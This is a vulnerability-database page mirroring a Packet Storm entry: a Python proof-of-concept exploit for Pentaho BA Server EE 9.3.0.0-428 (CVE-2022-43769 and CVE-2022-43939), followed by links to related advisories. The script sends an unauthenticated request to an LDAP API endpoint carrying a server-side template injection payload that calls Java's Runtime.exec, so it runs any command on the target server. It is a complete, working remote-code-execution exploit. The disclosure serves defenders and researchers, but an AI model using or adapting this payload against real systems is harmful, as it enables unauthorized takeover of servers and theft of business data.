Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormDwbznPACKETSTORM:171712
HistoryApr 05, 2023 - 12:00 a.m.

Pentaho BA Server EE 9.3.0.0-428 Server-Side Template Injection / Remote Code Execution

2023-04-0500:00:00
dwbzn
packetstormsecurity.com
125
pentaho ba server
server-side template injection
remote code execution
unauthenticated
cve-2022-43769
cve-2022-43939
windows 11
hitachi vantara
enterprise edition

0.562 Medium

EPSS

Percentile

97.7%

JSON
`# Title: Pentaho BA Server EE 9.3.0.0-428 - RCE via Server-Side Template Injection (Unauthenticated)  
# Author: dwbzn  
# Date: 2022-04-04  
# Vendor: https://www.hitachivantara.com/  
# Software Link: https://www.hitachivantara.com/en-us/products/lumada-dataops/data-integration-analytics/download-pentaho.html  
# Version: Pentaho BA Server 9.3.0.0-428  
# CVE: CVE-2022-43769, CVE-2022-43939  
# Tested on: Windows 11  
# Credits: https://research.aurainfosec.io/pentest/pentah0wnage  
# NOTE: This only works on the enterprise edition. Haven't tested it on Linux, but it should work (don't use notepad.exe).  
  
# Unauthenticated RCE via SSTI using CVE-2022-43769 and CVE-2022-43939 (https://research.aurainfosec.io/pentest/pentah0wnage)  
import requests  
import argparse  
  
parser = argparse.ArgumentParser(description='CVE-2022-43769 + CVE-2022-43939 - Unauthenticated RCE via SSTI')  
parser.add_argument('baseurl', type=str, help='base url e.g. http://127.0.0.1:8080/pentaho')  
parser.add_argument('--cmd', type=str, default='notepad.exe', nargs='?', help='command to execute (default notepad.exe)', required=False)  
args = parser.parse_args()  
  
url = f"{args.baseurl}/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{{T(java.lang.Runtime).getRuntime().exec('{args.cmd}')}}&mgrDn=a&pwd=a"  
  
print ("running...")  
r = requests.get(url)  
if r.text == 'false':  
print ("command should've executed! nice.")  
else:  
print ("didn't work. sadge...")  
`

Related

packetstorm 1
zdt 1
metasploit 1
exploitdb 1
rapid7blog 1
nvd 2
cve 2
nuclei 1
prion 2
cvelist 2
packetstorm
packetstorm
Pentaho Business Server Authentication Bypass / SSTI / Code Execution
2023-05-11 00:00:00
zdt
zdt
Pentaho BA Server EE 9.3.0.0-428 Server-Side Template Injection / Remote Code Execution
2023-04-05 00:00:00
metasploit
metasploit
Pentaho Business Server Auth Bypass and Server Side Template Injection RCE
2023-05-09 19:24:51
exploitdb
exploitdb
Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated)
2023-04-08 00:00:00
rapid7blog
rapid7blog
Metasploit Wrap-up
2023-05-12 17:41:20
nvd
nvd
CVE-2022-43939
2023-04-03 19:15:07
CVE-2022-43769
2023-04-03 18:15:07
cve
cve
CVE-2022-43939
2023-04-03 19:15:07
CVE-2022-43769
2023-04-03 18:15:07
nuclei
nuclei
Hitachi Pentaho Business Analytics Server - Remote Code Execution
2023-04-04 23:02:10
prion
prion
Design/Logic Flaw
2023-04-03 19:15:00
Design/Logic Flaw
2023-04-03 18:15:00
cvelist
cvelist
CVE-2022-43769 Hitachi Vantara Pentaho Business Analytics Server - Failure to Sanitize Special Elements into a Different Plane (Special Element Injection)
2023-04-03 17:47:45
CVE-2022-43939 Hitachi Vantara Pentaho Business Analytics Server - Use of Non-Canonical URL Paths for Authorization Decisions
2023-04-03 18:10:32

0.562 Medium

EPSS

Percentile

97.7%

JSON
Related for PACKETSTORM:171712
packetstorm1zdt1metasploit1exploitdb1rapid7blog1nvd2cve2nuclei1prion2cvelist2